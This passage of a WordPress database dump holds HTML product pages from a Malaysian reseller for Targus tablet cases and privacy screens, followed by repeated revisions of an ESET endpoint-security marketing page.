id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>VersaVu Signature </strong><strong>12.9-inchÂ </strong><strong> iPad</strong><strong>Â® </strong><strong>Pro</strong></h3><p style=\"text-align: center;\">(THZ750GL)</p><h3 style=\"text-align: center;\"><strong>SafePort Rugged </strong><strong>Case for </strong><strong>12.9-inch iPad </strong><strong>(6th gen. / 5th gen.)</strong></h3><p style=\"text-align: center;\">(THD138GLZ)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0050377_versavu-signature-series-case-for-129-in-ipad-pro-2018-black_grande.jpg?v=1571711590\" alt=\"VersaVuÂ® Signature Series Case for iPad ProÂ® (12.9-inch) 3rd gen. - Black\" width=\"190\" height=\"190\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/3_THD138GLZ_BACK2_1024x1024.jpg?v=1571711592\" width=\"189\" height=\"189\" /></p><ul><li>Available Color Black</li><li>Passes military grade 4â€™ drop testing* for robust protection</li><li>Premium fabric/faux leather exterior with metallic accents delivers standout style</li><li>Patented 360Â° rotation for quick-switch portrait/landscape viewing</li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position</li><li>Boosts sound with audio-scoops that direct sound toward user</li><li>Secure, metallic snap-close mechanism delivers quick access and striking style</li><li>Premium faux leather hand strap</li><li>Integrated Apple PencilÂ®/stylus holder</li><li>Limited lifetime warranty</li></ul><ul><li>Available Color Black</li><li>Heavy duty, shock-absorbing case for the iPad (6th gen. / 5th gen.), iPad Pro (9.7-inch)</li><li>Form-fit TPU shell with USA Military-Spec drop protection â€“ protects your device from 1.2m/4ft drops</li><li>Offers rugged protection in a slim, professional-looking case</li><li>Sound enhancing scoops for all iPad speakers</li><li>Integrated stand for stable viewing and comfortable typing</li><li>Optional detachable shoulder strap (THA101GLZ)</li><li>Compatible with the ambient light sensor and mic on your device</li><li>Clear window on back to display asset tag</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>Protect Case for Microsoft Surfaceâ„¢ Go</strong></h3><p style=\"text-align: center;\">(THZ779GL)</p><h3 style=\"text-align: center;\"><strong>Protect Case for Microsoft Surfaceâ„¢ Go</strong></h3><p style=\"text-align: center;\">(THD491GLZ)</p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/THZ779GL_11_PEN2_1024x1024.jpg?v=1571711592\" width=\"193\" height=\"193\" /></p><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/THD491GL_20_USE4_1024x1024.jpg?v=1571711592\" width=\"192\" height=\"192\" /></p><ul><li>Available Color Black</li><li>Case passes military grade 4â€™ drop testing (MIL-STD 810G)*</li><li>Hard-moulded tray with durable kickstand</li><li>Advanced corner protection with shock-absorbent TPU</li><li>Non-slip interior for infinite viewing angles</li><li>Integrated Surface Pen holder (pen not included)</li><li>Compatible with Surface Type Cover</li><li>Compatible with Surface Dock</li><li>Full access to camera and ports</li></ul><ul><li>Available Color Black</li><li>Case passes military grade 4â€™ drop testing (MIL-STD 810G)*</li><li>Hard-moulded tray with durable kickstand</li><li>Advanced corner protection with shock-absorbent TPU</li><li>Keyboard locking feature helps prevent accidental disconnects (keyboard not included)</li><li>Detachable hand strap (included) and integrated Surface Pen holder (pen not included)</li><li>Compatible with Surface Type Cover</li><li>Compatible with Surface Dock</li><li>Full access to camera and ports</li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n			<h1>Privacy Screen</h1>		\n		<h3 style=\"text-align: center;\"><strong>Apple Macbook</strong></h3><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0049031_magnetic-privacy-screen-for-133-macbook-2017_ebc5f6e1-9646-4840-9ef4-6441c94ae069_grande.jpg?v=1571711592\" alt=\"Magnetic Privacy Screen for 13.3\" width=\"274\" height=\"274\" /></p><h2 style=\"text-align: center;\"><strong>Magnetic Privacy Screen for Apple MacBook</strong></h2><ul id=\"product-features\"><li>Protect your on-screen data, Privacy Screens block angled viewing from prying eyes</li><li>Magnetic screens easy to attach, remove and reattach. No tools, no adhesives, no installation required</li><li>Blue light filter: Targus Privacy Screens reduce blue light for better protection and reading comfort</li><li>AvailableÂ  for :-</li></ul><ol><li style=\"list-style-type: none;\"><ol><li><h4>MacBook 12-inchÂ  (ASM12MBGL)</h4></li><li><h4>MacBook 13.3-inch (ASM133MBP6GL)</h4></li><li><h4>MacBook Air 13.3-inch (ASM133MBA7GL)</h4></li><li><h4>MacBook 15.4-inch (ASM154MBGL)</h4></li><li><h4>MacBook Pro 15.4-inch (ASM154MBP6GL)</h4></li></ol></li></ol><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>Microsoft Surface</strong></h3><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0023768_privacy-screen-microsoft-surface-pro-4-123-clear_grande.jpg?v=1571711583\" alt=\"Privacy Screen Microsoft Surface Pro 4 (12.3\" width=\"215\" height=\"215\" /></p><h2 style=\"text-align: center;\">Â Microsoft Surface Pro 4 (12.3\") - Clear</h2><ul id=\"product-features\"><li>Privacy Screen for theÂ Microsoft Surface Pro 4 (12.3\") tablet</li><li>Works with touch screen</li><li>Anti-glare</li><li>Protect the information on your screen from unwanted viewing</li><li>Targus privacy screens are more touch-sensitive than other screens on the market</li><li>Reversible screen: shiny side ensures clarity for viewing inside, matt side reduces glare for viewing outside or in a bright room<strong><a href=\"https://uk.targus.com/pages/keep-your-business-your-business\" target=\"_blank\" rel=\"noopener noreferrer\"><u><br /></u></a></strong></li></ul><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>Laptop</strong></h3><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0019195_privacy-screen-116w-169_grande.jpg?v=1571711590\" alt=\"Targus Privacy Screen 11.6\" width=\"307\" height=\"307\" /></p><h2 style=\"text-align: center;\">Privacy Screen</h2><ul id=\"product-features\"><li>Privacy Screen for tablet, laptop or desktop screens</li><li>Works with touch screens and dual screens</li><li>Blue light filter: Targus Privacy Screens reduce blue light for better protection and reading comfort</li><li>Anti-glare</li><li>Protect the information on your screen from unwanted viewing</li><li>Targus privacy screens are more touch-sensitive than other screens on the market</li><li>Reversible screen: shiny side ensures clarity for viewing inside, matt side reduces glare for viewing outside or in a bright room</li><li>Three easy attachment options: under-bezel tabs, tab guides or re-usable adhesive strips</li><li>Available for :-Â </li></ul><ol><li style=\"list-style-type: none;\"><ol><li><h4>Screen 11.6\"W 16:9 - (ASF116W9EU)</h4></li><li><h4>Screen 12.1\"W 16:10 - (ASF121WEU)</h4></li><li><h4>Screen 12.5\"W 16:9 - (ASF125W9EU)</h4></li><li><h4>Screen 13.3\"W 16:10 - (ASF133WEU)</h4></li><li><h4>Screen 13.3\"W 16:9 - (ASF133W9EU)</h4></li><li><h4>Screen 14.1\"W 16:10 - (ASF141WEU)</h4></li><li><h4>Screen 14.1\"W 16:9 - (ASF141W9EU)</h4></li><li><h4>Screen 14â€ W 16:9 - (ASF14W9EU)</h4></li><li><h4>Screen 15.4\"W 16:10 - (ASF154WEU)</h4></li><li><h4>Screen 15.6\"W 16:9 - (ASF156W9EU)</h4></li></ol></li></ol><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>		\n		<h3 style=\"text-align: center;\"><strong>Monitor</strong></h3><p><img src=\"https://cdn.shopify.com/s/files/1/0011/9229/6515/products/0019283_privacy-screen-17-43_grande.jpg?v=1571711590\" alt=\"Targus Privacy Screen 17\" width=\"269\" height=\"269\" /></p><h2 style=\"text-align: center;\">Privacy Screen</h2><ul id=\"product-features\"><li>Privacy Screen for laptop or desktop screens</li><li>Works with touch screens and dual screens</li><li>Blue light filter: Targus Privacy Screens reduce blue light for better protection and reading comfort</li><li>Anti-glare</li><li>Protect the information on your screen from unwanted viewing</li><li>Targus privacy screens are more touch-sensitive than other screens on the market</li><li>Reversible screen: shiny side ensures clarity for viewing inside, matt side reduces glare for viewing outside or in a bright room</li><li>Three easy attachment options: under-bezel tabs, tab guides or re-usable adhesive strips</li><li>Available for :-Â </li></ul><ol><li style=\"list-style-type: none;\"><ol><li><h4>Screen 17\"W 4:3 - (ASF170EU)</h4></li><li><h4>Screen 19\"W 4:3 - (ASF190EU)</h4></li><li><h4>Screen 19\"W 16:10 - (ASF19WEU)</h4></li><li><h4>Screen 21.5\"W 16:9 - (ASF215W9EU)</h4></li><li><h4>Screen 22\"W 16:10 - (ASF220WEU)</h4></li><li><h4>Screen 22\"W 16:9 - (ASF22W9EU)</h4></li><li><h4>Screen 23\"W 16:9 - (ASF23W9EU)</h4></li><li><h4>Screen 23.8\"W 16:9 - (ASF238W9EU)</h4></li><li><h4>Screen 24\"W 16:10 - (ASF24WEU)</h4></li><li><h4>Screen 24\"W 16:9 - (ASF24W9EU)</h4></li><li><h4>Screen 27\"W 16:9 - (ASF27W9EU)</h4></li></ol></li></ol><p style=\"text-align: center;\">[maxbutton id=\"17\"]</p>','Targus','','publish','closed','closed','','targus','','','2019-11-06 14:13:47','2019-11-06 06:13:47','',0,'https://bintara.com.my/?page_id=3686',0,'page','',0),(3687,1,'2019-10-31 08:54:40','2019-10-31 00:54:40','','Targus','','inherit','closed','closed','','3686-revision-v1','','','2019-10-31 08:54:40','2019-10-31 00:54:40','',3686,'https://bintara.com.my/blog/2019/10/31/3686-revision-v1/',0,'revision','',0),(3544,1,'2019-09-30 11:10:49','2019-09-30 03:10:49','<h2><strong>Protecting you worldwide</strong></h2>\r\nESET is here to secure your computers and devices, protect your precious family pictures and data, or keep your company know-how safe. We protect users just like you across 200 countries and territories worldwide, helping them to use and explore all the great opportunities of the Internet. We are proud that so many individuals and companies trust us to secure their digital lives.\r\n\r\n&nbsp;\r\n<h2><strong>Efficient endpoint security for small businesses</strong></h2>\r\n<h3><strong>Manage network security via the cloud. NoÂ need for extra hardware</strong></h3>\r\nManage IT security conveniently using ESET Cloud Administrator.Â Benefit from a single-point overview of your network security. Receive notifications as incidents occur. React immediately from wherever you are.\r\n\r\n<img class=\"wp-image-2446 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/eset.png\" alt=\"\" width=\"291\" height=\"203\" />\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li>All your network security management in one place</li>\r\n 	<li>Secure access via web browser</li>\r\n 	<li>Always the latest version â€“ updates automatically</li>\r\n 	<li>No need for extra hardware</li>\r\n</ul>\r\n<h3></h3>\r\n<h2><strong>Bundled solutions for small size business</strong></h2>\r\n<ol>\r\n 	<li>\r\n<h4><strong>ESET Secure Business Cloud</strong></h4>\r\n</li>\r\n</ol>\r\nComplete bundled security solution for endpoints and file servers. Email-borne threats blocked at server level. Provides:\r\n<ul>\r\n 	<li>Protection against targeted attacks</li>\r\n 	<li>Protection against ransomware</li>\r\n 	<li>Prevention of fileless attacks</li>\r\n 	<li>Protection of email gateway</li>\r\n 	<li>Cloud-based remote management</li>\r\n</ul>\r\n<ol start=\"2\">\r\n 	<li>\r\n<h4><strong>ESET Endpoint Protection Advanced Cloud</strong></h4>\r\n</li>\r\n</ol>\r\nMultilayered technology, machine learning and human expertise combined with automated security management. Provides:\r\n<ul>\r\n 	<li>Protection against targeted attacks</li>\r\n 	<li>Protection against ransomware</li>\r\n 	<li>Prevention of fileless attacks</li>\r\n 	<li>Cloud-based remote management</li>\r\n</ul>\r\n<ol start=\"3\">\r\n 	<li>\r\n<h4><strong>ESET Endpoint Protection Advanced</strong></h4>\r\n</li>\r\n</ol>\r\nMultilayered technology, machine learning and human expertise combined with automated security management. Provides:\r\n<ul>\r\n 	<li>Protection against targeted attacks</li>\r\n 	<li>Protection against ransomware</li>\r\n 	<li>Prevention of fileless attacks</li>\r\n 	<li>Remote management</li>\r\n</ul>\r\n<h3></h3>\r\n<h2><strong>Dynamic endpoint security for mid-size businesses</strong></h2>\r\n<h3><strong>Easy to use, single interface management of your endpoint security</strong></h3>\r\nESET Security Management Center provides a real-time overview of all your on-premise and off premise endpoints via an enterprise-grade console. Benefit from full reporting and security management for all operating systems.\r\n\r\n<img class=\"wp-image-2447 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/mid-size.png\" alt=\"\" width=\"269\" height=\"177\" />\r\n<ul>\r\n 	<li>Complete network visibility</li>\r\n 	<li>Full security management</li>\r\n 	<li>Flexible reporting</li>\r\n 	<li>Automated security management</li>\r\n</ul>\r\n<h3></h3>\r\n<h2><strong>Bundled solutions for mid size business</strong></h2>\r\n<ol>\r\n 	<li>\r\n<h4><strong>ESET Secure Business</strong></h4>\r\n</li>\r\n</ol>\r\nComplete bundled security solution for endpoints and file servers. Email-borne threats blocked at server level. Provides:\r\n<ul>\r\n 	<li>Protection against targeted attacks</li>\r\n 	<li>Protection against ransomware</li>\r\n 	<li>Prevention of fileless attacks</li>\r\n 	<li>Protection of email gateway</li>\r\n 	<li>Remote management</li>\r\n</ul>\r\n<ol start=\"2\">\r\n 	<li>\r\n<h4><strong>ESET Dynamic Endpoint Protection</strong></h4>\r\n</li>\r\n</ol>\r\nEnterprise-grade award-winning ESET endpoint protection with cloud-based sandboxing technology. Incorporates behavior-based detection easily managed via a single online console. Provides:\r\n<ul>\r\n 	<li>Targeted attacks protection</li>\r\n 	<li>Advanced persistent threats detection</li>\r\n 	<li>Protection against ransomware</li>\r\n 	<li>Zero-day threats detection</li>\r\n 	<li>Remote management</li>\r\n</ul>\r\n<ol start=\"3\">\r\n 	<li>\r\n<h4><strong>ESET Endpoint Protection Advanced</strong></h4>\r\n</li>\r\n</ol>\r\nMultilayered technology, machine learning and human expertise combined with automated security management. Provides:\r\n<ul>\r\n 	<li>Protection against targeted attacks</li>\r\n 	<li>Protection against ransomware</li>\r\n 	<li>Prevention of fileless attacks</li>\r\n 	<li>Remote management</li>\r\n</ul>\r\n<h3></h3>\r\n<h2><strong>Future ready cybersecurity for enterprise</strong></h2>\r\n<h3><strong>Bundled solutions for enterprise</strong></h3>\r\nFits all security requirements. Flexible and scalable to any IT environment.\r\n<ol>\r\n 	<li>\r\n<h4><strong>ESET Elite Targeted Attack Protection</strong></h4>\r\n</li>\r\n</ol>\r\nFull-scale protection encompassing all ESETâ€™s latest technologies and services for eliminating all known and unknown threats. Includes:\r\n<ul>\r\n 	<li>Security Management Center</li>\r\n 	<li>Endpoint Protection Platform</li>\r\n 	<li>Cloud Sandbox Analysis</li>\r\n 	<li>Endpoint Detection &amp; Response</li>\r\n 	<li>Manual Malware Analysis</li>\r\n 	<li>Forensic Analysis &amp; Consulting</li>\r\n</ul>\r\n<ol start=\"2\">\r\n 	<li>\r\n<h4><strong>ESET Targeted Attack Protection</strong></h4>\r\n</li>\r\n</ol>\r\nComplete, seamless prevention, detection and response solution, incorporating total visibility, for remediation of any security issue in the network. Includes:\r\n<ul>\r\n 	<li>Security Management Center</li>\r\n 	<li>Endpoint Protection Platform</li>\r\n 	<li>Cloud Sandbox Analysis</li>\r\n 	<li>Endpoint Detection &amp; Response</li>\r\n</ul>\r\n<ol start=\"3\">\r\n 	<li>\r\n<h4><strong>ESET Dynamic Endpoint Protection</strong></h4>\r\n</li>\r\n</ol>\r\nComprehensive, easily managed protection, incorporating off-premise cloud sandboxing leveraging machine learning and behavior-based detection. Includes:\r\n<ul>\r\n 	<li>Security Management Center</li>\r\n 	<li>Endpoint Protection Platform</li>\r\n 	<li>Cloud Sandbox Analysis</li>\r\n</ul>\r\n<ol start=\"4\">\r\n 	<li>\r\n<h4><strong>ESET Endpoint Protection Advanced</strong></h4>\r\n</li>\r\n</ol>\r\nMultilayered protection utilizing multiple technologies and incorporating visibility management and reporting across all operating systems. Includes:\r\n<ul>\r\n 	<li>Security Management Center</li>\r\n 	<li>Endpoint Protection Platform</li>\r\n</ul>\r\n<ol start=\"5\">\r\n 	<li>\r\n<h4><strong>ESET Dynamic Mail Protection</strong></h4>\r\n</li>\r\n</ol>\r\nBusiness solution incorporating antispam, anti-phishing and Cloud Sandbox Analysis for the complete protection of mailboxes and mail servers. Includes:\r\n<ul>\r\n 	<li>Security Management Center</li>\r\n 	<li>Cloud Sandbox Analysis</li>\r\n 	<li>Mail Security</li>\r\n</ul>\r\n<ol start=\"6\">\r\n 	<li>\r\n<h4><strong>ESET Identity &amp; Data Protection</strong></h4>\r\n</li>\r\n</ol>\r\nBusiness solution for superior and enhanced protection of an organizationâ€™s data and intellectual property. Includes:\r\n<ul>\r\n 	<li>Two-factor Authentication</li>\r\n 	<li>Endpoint Encryption</li>\r\n</ul>\r\nTo discover more, please click the button below or contact us to discuss your needs.\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n&nbsp;','ESET','','inherit','closed','closed','','1477-revision-v1','','','2019-09-30 11:10:49','2019-09-30 03:10:49','',1477,'https://bintara.com.my/blog/2019/09/30/1477-revision-v1/',0,'revision','',0),(3545,1,'2019-09-30 11:13:08','2019-09-30 03:13:08','<h2><strong>Protecting you worldwide</strong></h2>\r\nESET is here to secure your computers and devices, protect your precious family pictures and data, or keep your company know-how safe. We protect users just like you across 200 countries and territories worldwide, helping them to use and explore all the great opportunities of the Internet. We are proud that so many individuals and companies trust us to secure their digital lives.\r\n\r\n&nbsp;\r\n<h2><strong>Efficient endpoint security for small businesses</strong></h2>\r\n<h3><strong>Manage network security via the cloud. NoÂ need for extra hardware</strong></h3>\r\nManage IT security conveniently using ESET Cloud Administrator.Â Benefit from a single-point overview of your network security. Receive notifications as incidents occur. React immediately from wherever you are.\r\n\r\n<img class=\"wp-image-2446 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/eset.png\" alt=\"\" width=\"291\" height=\"203\" />\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li>All your network security management in one place</li>\r\n 	<li>Secure access via web browser</li>\r\n 	<li>Always the latest version â€“ updates automatically</li>\r\n 	<li>No need for extra hardware</li>\r\n</ul>\r\n\r\n&nbsp;\r\n<h2><strong>Bundled solutions for small size business</strong></h2>\r\n<ol>\r\n 	<li>\r\n<h4><strong>ESET Secure Business Cloud</strong></h4>\r\n</li>\r\n</ol>\r\nComplete bundled security solution for endpoints and file servers. Email-borne threats blocked at server level. Provides:\r\n<ul>\r\n 	<li>Protection against targeted attacks</li>\r\n 	<li>Protection against ransomware</li>\r\n 	<li>Prevention of fileless attacks</li>\r\n 	<li>Protection of email gateway</li>\r\n 	<li>Cloud-based remote management</li>\r\n</ul>\r\n<ol start=\"2\">\r\n 	<li>\r\n<h4><strong>ESET Endpoint Protection Advanced Cloud</strong></h4>\r\n</li>\r\n</ol>\r\nMultilayered technology, machine learning and human expertise combined with automated security management. Provides:\r\n<ul>\r\n 	<li>Protection against targeted attacks</li>\r\n 	<li>Protection against ransomware</li>\r\n 	<li>Prevention of fileless attacks</li>\r\n 	<li>Cloud-based remote management</li>\r\n</ul>\r\n<ol start=\"3\">\r\n 	<li>\r\n<h4><strong>ESET Endpoint Protection Advanced</strong></h4>\r\n</li>\r\n</ol>\r\nMultilayered technology, machine learning and human expertise combined with automated security management. Provides:\r\n<ul>\r\n 	<li>Protection against targeted attacks</li>\r\n 	<li>Protection against ransomware</li>\r\n 	<li>Prevention of fileless attacks</li>\r\n 	<li>Remote management</li>\r\n</ul>\r\n<h3></h3>\r\n<h2><strong>Dynamic endpoint security for mid-size businesses</strong></h2>\r\n<h3><strong>Easy to use, single interface management of your endpoint security</strong></h3>\r\nESET Security Management Center provides a real-time overview of all your on-premise and off premise endpoints via an enterprise-grade console. Benefit from full reporting and security management for all operating systems.\r\n\r\n<img class=\"wp-image-2447 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/mid-size.png\" alt=\"\" width=\"269\" height=\"177\" />\r\n<ul>\r\n 	<li>Complete network visibility</li>\r\n 	<li>Full security management</li>\r\n 	<li>Flexible reporting</li>\r\n 	<li>Automated security management</li>\r\n</ul>\r\n<h3></h3>\r\n<h2><strong>Bundled solutions for mid size business</strong></h2>\r\n<ol>\r\n 	<li>\r\n<h4><strong>ESET Secure Business</strong></h4>\r\n</li>\r\n</ol>\r\nComplete bundled security solution for endpoints and file servers. Email-borne threats blocked at server level. Provides:\r\n<ul>\r\n 	<li>Protection against targeted attacks</li>\r\n 	<li>Protection against ransomware</li>\r\n 	<li>Prevention of fileless attacks</li>\r\n 	<li>Protection of email gateway</li>\r\n 	<li>Remote management</li>\r\n</ul>\r\n<ol start=\"2\">\r\n 	<li>\r\n<h4><strong>ESET Dynamic Endpoint Protection</strong></h4>\r\n</li>\r\n</ol>\r\nEnterprise-grade award-winning ESET endpoint protection with cloud-based sandboxing technology. Incorporates behavior-based detection easily managed via a single online console. Provides:\r\n<ul>\r\n 	<li>Targeted attacks protection</li>\r\n 	<li>Advanced persistent threats detection</li>\r\n 	<li>Protection against ransomware</li>\r\n 	<li>Zero-day threats detection</li>\r\n 	<li>Remote management</li>\r\n</ul>\r\n<ol start=\"3\">\r\n 	<li>\r\n<h4><strong>ESET Endpoint Protection Advanced</strong></h4>\r\n</li>\r\n</ol>\r\nMultilayered technology, machine learning and human expertise combined with automated security management. Provides:\r\n<ul>\r\n 	<li>Protection against targeted attacks</li>\r\n 	<li>Protection against ransomware</li>\r\n 	<li>Prevention of fileless attacks</li>\r\n 	<li>Remote management</li>\r\n</ul>\r\n<h3></h3>\r\n<h2><strong>Future ready cybersecurity for enterprise</strong></h2>\r\n<h3><strong>Bundled solutions for enterprise</strong></h3>\r\nFits all security requirements. Flexible and scalable to any IT environment.\r\n<ol>\r\n 	<li>\r\n<h4><strong>ESET Elite Targeted Attack Protection</strong></h4>\r\n</li>\r\n</ol>\r\nFull-scale protection encompassing all ESETâ€™s latest technologies and services for eliminating all known and unknown threats. Includes:\r\n<ul>\r\n 	<li>Security Management Center</li>\r\n 	<li>Endpoint Protection Platform</li>\r\n 	<li>Cloud Sandbox Analysis</li>\r\n 	<li>Endpoint Detection &amp; Response</li>\r\n 	<li>Manual Malware Analysis</li>\r\n 	<li>Forensic Analysis &amp; Consulting</li>\r\n</ul>\r\n<ol start=\"2\">\r\n 	<li>\r\n<h4><strong>ESET Targeted Attack Protection</strong></h4>\r\n</li>\r\n</ol>\r\nComplete, seamless prevention, detection and response solution, incorporating total visibility, for remediation of any security issue in the network. Includes:\r\n<ul>\r\n 	<li>Security Management Center</li>\r\n 	<li>Endpoint Protection Platform</li>\r\n 	<li>Cloud Sandbox Analysis</li>\r\n 	<li>Endpoint Detection &amp; Response</li>\r\n</ul>\r\n<ol start=\"3\">\r\n 	<li>\r\n<h4><strong>ESET Dynamic Endpoint Protection</strong></h4>\r\n</li>\r\n</ol>\r\nComprehensive, easily managed protection, incorporating off-premise cloud sandboxing leveraging machine learning and behavior-based detection. Includes:\r\n<ul>\r\n 	<li>Security Management Center</li>\r\n 	<li>Endpoint Protection Platform</li>\r\n 	<li>Cloud Sandbox Analysis</li>\r\n</ul>\r\n<ol start=\"4\">\r\n 	<li>\r\n<h4><strong>ESET Endpoint Protection Advanced</strong></h4>\r\n</li>\r\n</ol>\r\nMultilayered protection utilizing multiple technologies and incorporating visibility management and reporting across all operating systems. Includes:\r\n<ul>\r\n 	<li>Security Management Center</li>\r\n 	<li>Endpoint Protection Platform</li>\r\n</ul>\r\n<ol start=\"5\">\r\n 	<li>\r\n<h4><strong>ESET Dynamic Mail Protection</strong></h4>\r\n</li>\r\n</ol>\r\nBusiness solution incorporating antispam, anti-phishing and Cloud Sandbox Analysis for the complete protection of mailboxes and mail servers. Includes:\r\n<ul>\r\n 	<li>Security Management Center</li>\r\n 	<li>Cloud Sandbox Analysis</li>\r\n 	<li>Mail Security</li>\r\n</ul>\r\n<ol start=\"6\">\r\n 	<li>\r\n<h4><strong>ESET Identity &amp; Data Protection</strong></h4>\r\n</li>\r\n</ol>\r\nBusiness solution for superior and enhanced protection of an organizationâ€™s data and intellectual property. Includes:\r\n<ul>\r\n 	<li>Two-factor Authentication</li>\r\n 	<li>Endpoint Encryption</li>\r\n</ul>\r\nTo discover more, please click the button below or contact us to discuss your needs.\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n&nbsp;','ESET','','inherit','closed','closed','','1477-revision-v1','','','2019-09-30 11:13:08','2019-09-30 03:13:08','',1477,'https://bintara.com.my/blog/2019/09/30/1477-revision-v1/',0,'revision','',0),(3546,1,'2019-09-30 11:15:37','2019-09-30 03:15:37','<h2><strong>Protecting you worldwide</strong></h2>\r\nESET is here to secure your computers and devices, protect your precious family pictures and data, or keep your company know-how safe. We protect users just like you across 200 countries and territories worldwide, helping them to use and explore all the great opportunities of the Internet. We are proud that so many individuals and companies trust us to secure their digital lives.\r\n\r\n&nbsp;\r\n<h2><strong>Efficient endpoint security for small businesses</strong></h2>\r\n<h3><strong>Manage network security via the cloud. NoÂ need for extra hardware</strong></h3>\r\nManage IT security conveniently using ESET Cloud Administrator.Â Benefit from a single-point overview of your network security. Receive notifications as incidents occur. React immediately from wherever you are.\r\n\r\n<img class=\"wp-image-2446 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/eset.png\" alt=\"\" width=\"291\" height=\"203\" />\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li>All your network security management in one place</li>\r\n 	<li>Secure access via web browser</li>\r\n 	<li>Always the latest version â€“ updates automatically</li>\r\n 	<li>No need for extra hardware</li>\r\n</ul>\r\n\r\n&nbsp;\r\n<h2><strong>Bundled solutions for small size business</strong></h2>\r\n<ol>\r\n 	<li>\r\n<h4><strong>ESET Secure Business Cloud</strong></h4>\r\n</li>\r\n</ol>\r\nComplete bundled security solution for endpoints and file servers. Email-borne threats blocked at server level. Provides:\r\n<ul>\r\n 	<li>Protection against targeted attacks</li>\r\n 	<li>Protection against ransomware</li>\r\n 	<li>Prevention of fileless attacks</li>\r\n 	<li>Protection of email gateway</li>\r\n 	<li>Cloud-based remote management</li>\r\n</ul>\r\n<ol start=\"2\">\r\n 	<li>\r\n<h4><strong>ESET Endpoint Protection Advanced Cloud</strong></h4>\r\n</li>\r\n</ol>\r\nMultilayered technology, machine learning and human expertise combined with automated security management. Provides:\r\n<ul>\r\n 	<li>Protection against targeted attacks</li>\r\n 	<li>Protection against ransomware</li>\r\n 	<li>Prevention of fileless attacks</li>\r\n 	<li>Cloud-based remote management</li>\r\n</ul>\r\n<ol start=\"3\">\r\n 	<li>\r\n<h4><strong>ESET Endpoint Protection Advanced</strong></h4>\r\n</li>\r\n</ol>\r\nMultilayered technology, machine learning and human expertise combined with automated security management. Provides:\r\n<ul>\r\n 	<li>Protection against targeted attacks</li>\r\n 	<li>Protection against ransomware</li>\r\n 	<li>Prevention of fileless attacks</li>\r\n 	<li>Remote management</li>\r\n</ul>\r\n\r\n&nbsp;\r\n<h2><strong>Dynamic endpoint security for mid-size businesses</strong></h2>\r\n<h3><strong>Easy to use, single interface management of your endpoint security</strong></h3>\r\nESET Security Management Center provides a real-time overview of all your on-premise and off premise endpoints via an enterprise-grade console. Benefit from full reporting and security management for all operating systems.\r\n\r\n<img class=\"wp-image-2447 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/mid-size.png\" alt=\"\" width=\"269\" height=\"177\" />\r\n<ul>\r\n 	<li>Complete network visibility</li>\r\n 	<li>Full security management</li>\r\n 	<li>Flexible reporting</li>\r\n 	<li>Automated security management</li>\r\n</ul>\r\n\r\n&nbsp;\r\n<h2><strong>Bundled solutions for mid size business</strong></h2>\r\n<ol>\r\n 	<li>\r\n<h4><strong>ESET Secure Business</strong></h4>\r\n</li>\r\n</ol>\r\nComplete bundled security solution for endpoints and file servers. Email-borne threats blocked at server level. Provides:\r\n<ul>\r\n 	<li>Protection against targeted attacks</li>\r\n 	<li>Protection against ransomware</li>\r\n 	<li>Prevention of fileless attacks</li>\r\n 	<li>Protection of email gateway</li>\r\n 	<li>Remote management</li>\r\n</ul>\r\n<ol start=\"2\">\r\n 	<li>\r\n<h4><strong>ESET Dynamic Endpoint Protection</strong></h4>\r\n</li>\r\n</ol>\r\nEnterprise-grade award-winning ESET endpoint protection with cloud-based sandboxing technology. Incorporates behavior-based detection easily managed via a single online console. Provides:\r\n<ul>\r\n 	<li>Targeted attacks protection</li>\r\n 	<li>Advanced persistent threats detection</li>\r\n 	<li>Protection against ransomware</li>\r\n 	<li>Zero-day threats detection</li>\r\n 	<li>Remote management</li>\r\n</ul>\r\n<ol start=\"3\">\r\n 	<li>\r\n<h4><strong>ESET Endpoint Protection Advanced</strong></h4>\r\n</li>\r\n</ol>\r\nMultilayered technology, machine learning and human expertise combined with automated security management. Provides:\r\n<ul>\r\n 	<li>Protection against targeted attacks</li>\r\n 	<li>Protection against ransomware</li>\r\n 	<li>Prevention of fileless attacks</li>\r\n 	<li>Remote management</li>\r\n</ul>\r\n\r\n&nbsp;\r\n<h2><strong>Future ready cybersecurity for enterprise</strong></h2>\r\n<h3><strong>Bundled solutions for enterprise</strong></h3>\r\nFits all security requirements. Flexible and scalable to any IT environment.\r\n<ol>\r\n 	<li>\r\n<h4><strong>ESET Elite Targeted Attack Protection</strong></h4>\r\n</li>\r\n</ol>\r\nFull-scale protection encompassing all ESETâ€™s latest technologies and services for eliminating all known and unknown threats. Includes:\r\n<ul>\r\n 	<li>Security Management Center</li>\r\n 	<li>Endpoint Protection Platform</li>\r\n 	<li>Cloud Sandbox Analysis</li>\r\n 	<li>Endpoint Detection &amp; Response</li>\r\n 	